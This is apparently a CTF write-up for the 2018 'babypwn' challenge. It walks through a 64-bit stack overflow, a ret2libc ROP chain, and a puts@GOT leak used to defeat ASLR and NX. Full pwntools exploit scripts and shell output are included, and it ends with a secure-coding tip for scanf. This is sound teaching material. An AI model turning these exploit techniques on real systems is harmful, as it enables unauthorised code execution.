Source & Ref : Fahad Alharbi
Objectives
- vulnerability concepts
- ASLR and NX concepts
- understanding GOT and PLT
- Bypass Non-Execute
- leaking base address
- secure coding
Sup folk, a couple a week ago I participated in pwn unversity 2018 and my goal was is only to focuses on Binary Exploitation since I do not have a team and I do not need one , because the goal of the CTF’s from my perspective is to improve your skills some people agree/disagree. Anyway let’s get start , they provides a both binary and libc. The first though came to my mind is ASLR enable and some memory protections need to bypass , if you do a bunch of binary exploitation, it will come to your mind as well.
- babypwn2018 Let’s start at the beginning , first we need to disable ASLR and we’ll enable it later
echo 0 > /proc/sys/kernel/randomize_va_space
vagrant@vagrant:~/pwn/pwn_university2018/babypwn$ file babypwn
babypwn: setuid, setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=aceea8523337cd304e3835a461e68c809d12fc01, not stripped
we’ve know that we are dealing with x64 ! who caries it’s going to be easy to exploit weather x86 or x64 , However there is something different between them and hopefully gonna cover this
check the memory protections
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : FULL
it’s time to test the binary
vagrant@vagrant:~/pwn/pwn_university2018/babypwn$ echo ` python -c 'print "A" * 0x500'` | ./babypwn
Welcome student! Can you run /bin/sh
Segmentation fault (core dumped)
Hola , our game just get start it since we’ve seen Segmentation fault , now let’s try to understand the binary and disassemble it to see what we are dealing with !
gdb-peda$ pdisass main
Dump of assembler code for function main:
0x0000000000401169 <+0>: push rbp
0x000000000040116a <+1>: mov rbp,rsp
0x000000000040116d <+4>: lea rdi,[rip+0xe9c] # 0x402010 #
0x0000000000401174 <+11>: call 0x401030 <puts@plt>
0x0000000000401179 <+16>: mov rax,QWORD PTR [rip+0x2e90] # 0x404010 <stdout@@GLIBC_2.2.5>
0x0000000000401180 <+23>: mov rdi,rax
0x0000000000401183 <+26>: call 0x401040 <fflush@plt>
0x0000000000401188 <+31>: mov eax,0x0
0x000000000040118d <+36>: call 0x401146 <copy> // we are going to check this out
0x0000000000401192 <+41>: mov eax,0x0
0x0000000000401197 <+46>: pop rbp
0x0000000000401198 <+47>: ret
End of assembler dump.
in the above disassmble nothing interesting except copy call , so let’s check it out
Here is the vulnerability function and scanf doesn’t check the size , so it’s insecure and have ability to overwrite the return address
gdb-peda$ pdisass copy
Dump of assembler code for function copy:
0x0000000000401146 <+0>: push rbp //
0x0000000000401147 <+1>: mov rbp,rsp
0x000000000040114a <+4>: add rsp,0xffffffffffffff80
0x000000000040114e <+8>: lea rax,[rbp-0x80] //char size
0x0000000000401152 <+12>: mov rsi,rax
0x0000000000401155 <+15>: lea rdi,[rip+0xeac] # 0x402008 // variable[80]
0x000000000040115c <+22>: mov eax,0x0
0x0000000000401161 <+27>: call 0x401050 <__isoc99_scanf@plt>
0x0000000000401166 <+32>: nop
0x0000000000401167 <+33>: leave
0x0000000000401168 <+34>: ret
End of assembler dump.
pseudocode
it will be some thing like this
char buf[112];
scanf("%s",0x402008)
scanf()*
The C library function int scanf(const char *format, ...) reads formatted input from stdin.
no need more analysis since we’re dealing with a based stack overflow , since there is no malloc or alloc , we can overwrite the return address directly but keep in mind NX enable,However we are going to bypass it ,
NX (No-Execute)
Its an exploit mitigation technique which makes certain areas of memory non executable and makes an executable area, non writable. Example: Data, stack and heap segments are made non executable while text segment is made non writable.
Bypass NX
NX-Stack
• Code injected onto the stack will not run
• Now enabled by default in most Linux
distributions, OpenBSD, Mac OS X, and
Windows
• Bypass techniques involve executing code
elsewhere, not on the stack
• The return address can still be overwritten
#ret2data techniques
• Place shellcode in the data section
– Using buffered I/O, which places data on the
heap, or some other technique
• Use the corrupted return value to jump to
it
ret2libc
Use return address to jump directly to
code in libc
– Such as system() on Unix or WinExec() on
Windows
#using mprotect() syscall to make the stack executable
fuzzing and dtermine the offset
gdb-peda$ pattern_create 500 1.txt
Writing pattern of 500 chars to filename "1.txt"
gdb-peda$ r < 1.txt
gdb-peda$ x/wx $rsp
0x7ffdaf7ad538: 0x41514141
gdb-peda$ pattern_offset 0x41514141
1095844161 found at offset: 136
difference between x64 and x86 overwrite RIP we got the top of the Stack and you may wonder why in x64 cannot overwrite the RIP directly with 0x4141414141?
the simple answer for that is the biggest address in x64 is 0x00007fffffffffff so we can’t overwrite it 0x41414141414141 for instance, make sense right ?
Controling RIP
>>> "A" * 136 + "CCCC"
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC'
if you make C * 8 which means won’t meet the prerequiste since the highest address is ‘0x00007fffffffffff’. Since our goal gaining a shell in this challenge ,I’d remind you , NX enable and should use one of those techniques that we talked about it in the privious. In this case , I’ll use ret2libc , now let’s get the system call and find “/bin/sh” string addresses for later use
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x7f29b5438390 <__libc_system>
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 4 results, display max 4 items:
babypwn : 0x40202d --> 0x68732f6e69622f ('/bin/sh')
babypwn : 0x40302d --> 0x68732f6e69622f ('/bin/sh')
[heap] : 0x135602d ("/bin/sh\n")
libc : 0x7f29b557fd57 --> 0x68732f6e69622f ('/bin/sh')
our payload now is ready to get a shell , let’s make it
#Clearify x64 & x86
to perform ret2libc in x86 we can use the payload such as like this
x86
| JUNK | system | FAKE | /bin/sh |
However , since we know the highest address in x64 should be less or equal 0x00007fffffffffff , in this case we are going to use ROP gadget and our payload should be like this
x64
| JUNK | POPRDI | /bin/sh | system |
https://github.com/sashs/Ropper
let’s find a pop rdi using Ropper
vagrant@vagrant:~/pwn/pwn_university2018/babypwn$ ropper --file babypwn --search "pop rdi"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdi
[INFO] File: babypwn
0x0000000000401203: pop rdi; ret;
let’s go ahead and improve our exploit
from pwn import *
def exploit(r):
system = p64(0x7ffff7a52390)
sh = p64(0x7ffff7b99d57)
poprdi = p64(0x0000000000401203)
junk = "\x90" * 136
r.sendline(junk + poprdi + sh + system)
r.interactive()
if __name__ == '__main__':
if(len(sys.argv) > 1):
r = remote(HOST,PORT)
exploit(r)
else:
file = 'babypwn'
binary = os.getcwd() + '/' + str(file)
r = process(binary)
print(util.proc.pidof(r))
pause()
exploit(r)
when we run the exploit , it’s gonna work and give us a shell
vagrant@vagrant:~/pwn/pwn_university2018/babypwn$ python writeup.py
[+] Starting local process '/home/vagrant/pwn/pwn_university2018/babypwn/babypwn': pid 2132
[2132]
[*] Paused (press any to continue)
[*] Switching to interactive mode
Welcome student! Can you run /bin/sh
$ id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
let’s see what happened in the low level and how we obtain the shell
0x0000000000401166 <+32>: nop
0x0000000000401167 <+33>: leave
0x0000000000401168 <+34>: ret
End of assembler dump.
gdb-peda$ b *0x0000000000401166
Breakpoint 1 at 0x401166
when we run the exploit that’s what will happened
0x401167 <copy+33>: leave
=> 0x401168 <copy+34>: ret
0x401169 <main>: push rbp
0x40116a <main+1>: mov rbp,rsp
0x40116d <main+4>: lea rdi,[rip+0xe9c] # 0x402010
0x401174 <main+11>: call 0x401030 <puts@plt>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe448 --> 0x401203 (<__libc_csu_init+99>: pop rdi)
0008| 0x7fffffffe450 --> 0x7ffff7b99d57 --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7fffffffe458 --> 0x7ffff7a52390 (<__libc_system>: test rdi,rdi)
0024| 0x7fffffffe460 --> 0x0
0032| 0x7fffffffe468 --> 0x7fffffffe538 --> 0x7fffffffe758 ("/home/vagrant/pwn/pwn_university2018/babypwn/babypwn")
0040| 0x7fffffffe470 --> 0x1f7ffcca0
0048| 0x7fffffffe478 --> 0x401169 (<main>: push rbp)
0056| 0x7fffffffe480 --> 0x0
the stack will pop rdi then /bin/sh will insert to rdi , then it will return to libc_system
ASLR ( address space layout randomization )
ASLR was introduced into the Linux kernel in 2005, earlier in 2004 it has been available as a patch. With memory randomization enabled the address space in which an application is randomised. Meaning that an application does not use the address space on each execution. This is standard behaviour for Linux modules as they are required to be compiled with ASLR support. For you to observe this though it most be enabled in the Kernel using the procfs. It is enabled by default in most Linux distributions if not all
How we can bypass the ASLR ?
In order to bypass the ASLR need to leak the pointer address and I’m going to introduce that.
Why do we need bypass ASLR ?
let’s simplify the answer , in our exploit we’ve got the system call and /bin/sh addresses , So what if I tell you if the ASLR enable and you get the addresses when you run the program using gdb and once you quit then back to run the program again the addresses that you got before it will be totally differnt from the newest one , got it ? cool. Now let’s go back and try to find a way to leak the pointer address ,
GOT
GOT stands for Global Offsets Table and is similarly used to resolve addresses. Both PLT and GOT and other relocation information is explained in greater length in this article.
PLT
PLT stands for Procedure Linkage Table which is, put simply, used to call external procedures/functions whose address isn't known in the time of linking, and is left to be resolved by the dynamic linker at run time.
Leak the address of a library function in GOT
In order to leak the address , first we need to check the disassembly code out and decide what GOT will use to survive us
0x0000000000401169 <+0>: push rbp
0x000000000040116a <+1>: mov rbp,rsp
0x000000000040116d <+4>: lea rdi,[rip+0xe9c] # 0x402010
0x0000000000401174 <+11>: call 0x401030 <puts@plt>
0x0000000000401179 <+16>: mov rax,QWORD PTR [rip+0x2e90] # 0x404010 <stdout@@GLIBC_2.2.5>
0x0000000000401180 <+23>: mov rdi,rax
we can see the puts@plt , and the pointer is 0x402010 which hold “Welcome student! Can you run /bin/sh”. Why is that important to us , instead of print a regular string , we’re going to force the put to print a specfic address for later use.
let’s get GOT first
vagrant@vagrant:~/pwn/pwn_university2018/babypwn$ objdump -R ./babypwn | grep put
0000000000403fc8 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5
now we need to use put@plt in order to make the leak happen and print put@got pointer after that we can calculate to get the base address. Here we go now let’s improve our exploit and make some modify on it
from pwn import *
def exploit(r):
system = p64(0x7ffff7a52390)
sh = p64(0x7ffff7b99d57)
poprdi = p64(0x0000000000401203)
junk = "\x90" * 136
puts_plt = p64(0x401030)
puts_got = p64(0x0000000000403fc8)
main = p64(0x0000000000401169)
r.sendline(junk + poprdi + puts_got + puts_plt + main)
r.interactive()
if __name__ == '__main__':
if(len(sys.argv) > 1):
r = remote(HOST,PORT)
exploit(r)
else:
file = 'babypwn'
binary = os.getcwd() + '/' + str(file)
r = process(binary)
print(util.proc.pidof(r))
pause()
exploit(r)
vagrant@vagrant:~/pwn/pwn_university2018/babypwn$ python writeup.py
[+] Starting local process '/home/vagrant/pwn/pwn_university2018/babypwn/babypwn': pid 2513
[2513]
[*] Paused (press any to continue)
[*] Switching to interactive mode
Welcome student! Can you run /bin/sh
let’s hit the gdb and see what is happened through the payload execution
=> 0x401168 <copy+34>: ret
0x401169 <main>: push rbp
0x40116a <main+1>: mov rbp,rsp
0x40116d <main+4>: lea rdi,[rip+0xe9c] # 0x402010
0x401174 <main+11>: call 0x401030 <puts@plt>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe448 --> 0x401203 (<__libc_csu_init+99>: pop rdi) //
0008| 0x7fffffffe450 --> 0x403fc8 --> 0x7ffff7a7c690 (<_IO_puts>: push r12) // #1
0016| 0x7fffffffe458 --> 0x401030 (<puts@plt>: jmp QWORD PTR [rip+0x2f92] # 0x403fc8) #2
0024| 0x7fffffffe460 --> 0x401169 (<main>: push rbp)
0032| 0x7fffffffe468 --> 0x7fffffffe500 --> 0x401060 (<_start>: repz nop edx)
0040| 0x7fffffffe470 --> 0x1f7ffcca0
0048| 0x7fffffffe478 --> 0x401169 (<main>: push rbp)
0056| 0x7fffffffe480 --> 0x0
- 1- it will pop the put_got into rdi register
- 2- time to return to put@plt and going to print the address (leak function)
Clearly now we can see the leak address and time to fix our exploit and make some calculation
Welcome student! Can you run /bin/sh
\x90Ƨ��
fix our exploit
let’s add the buttom code to store the leak address into a value then print it, then we are going to calculuate the libc base address. Let’s do that
r.recvline("Welcome student! Can you run /bin/sh")
data = r.recv(6)
data += "\x00" *(8 - len(data))
leak = u64(data)
libcAddress = leak - libc.sym['puts']
log.info("[+] libc.address : " + hex(libcAddress))
ELF symbool
- libc.sym[‘puts’] Symbols are a symbolic reference to some type of data or code such as a global variable or function
getting libc base address is the first step to bypass ASLR. However , so far we’re disabling ASLR remeber that. Now pretty sure we are ready to bypass ASLR , so let’s enable it
echo 2 > /proc/sys/kernel/randomize_va_space
from pwn import *
def exploit(r):
system = p64(0x7ffff7a52390)
sh = p64(0x7ffff7b99d57)
poprdi = p64(0x0000000000401203)
puts_plt = p64(0x401030)
puts_got = p64(0x0000000000403fc8)
main = p64(0x0000000000401169)
r.sendline(junk + poprdi + puts_got + puts_plt + main)
r.recvline("Welcome student! Can you run /bin/sh")
data = r.recv(6)
data += "\x00" *(8 - len(data))
leak = u64(data)
libcAddress = leak - libc.symbols['puts']
system = libcAddress + libc.symbols['system']
sh = libcAddress + next(libc.search('/bin/sh'))
log.info("[+] libc.address : " + hex(leak))
log.info("[+] system : " + hex(system))
log.info("[+] /bin/sh : " + hex(sh))
r.sendline(junk + poprdi + p64(sh) + p64(system) )
r.interactive()
if __name__ == '__main__':
if(len(sys.argv) > 1):
r = remote(HOST,PORT)
exploit(r)
else:
file = 'babypwn'
binary = os.getcwd() + '/' + str(file)
r = process(binary)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print(util.proc.pidof(r))
pause()
exploit(r)
our exploit is ready to hit
vagrant@vagrant:~/pwn/pwn_university2018/babypwn$ python writeup.py
[+] Starting local process '/home/vagrant/pwn/pwn_university2018/babypwn/babypwn': pid 3135
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[3135]
[*] Paused (press any to continue)
[*] [+] libc.address : 0x7f81e7206690
[*] [+] system : 0x7f81e71dc390
[*] [+] /bin/sh : 0x7f81e7323d57
[*] Switching to interactive mode
Welcome student! Can you run /bin/sh
$ id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
Secure coding
if you are lazy programmer and you want to use string in scanf that fine. It can use scanf with pointers and free it once you’ve done.
””” Many answers here discuss the potential overflow issues of using scanf(“%s”, buf), but the latest POSIX specification more-or-less resolves this issue by providing an m assignment-allocation character that can be used in format specifiers for c, s, and [ formats. This will allow scanf to allocate as much memory as necessary with malloc (so it must be freed later with free).
”””
char *buf;
scanf("%ms", &buf); // with 'm', scanf expects a pointer to pointer to char.
// use buf
free(buf);
References
https://samsclass.info/127/lec/ch14.pdf
https://www.theurbanpenguin.com/aslr-address-space-layout-randomization/
https://reverseengineering.stackexchange.com/questions/1992/what-is-plt-got
https://www.packtpub.com/mapt/book/networking_and_servers/9781782167105/2/ch02lvl1sec15/elf-symbols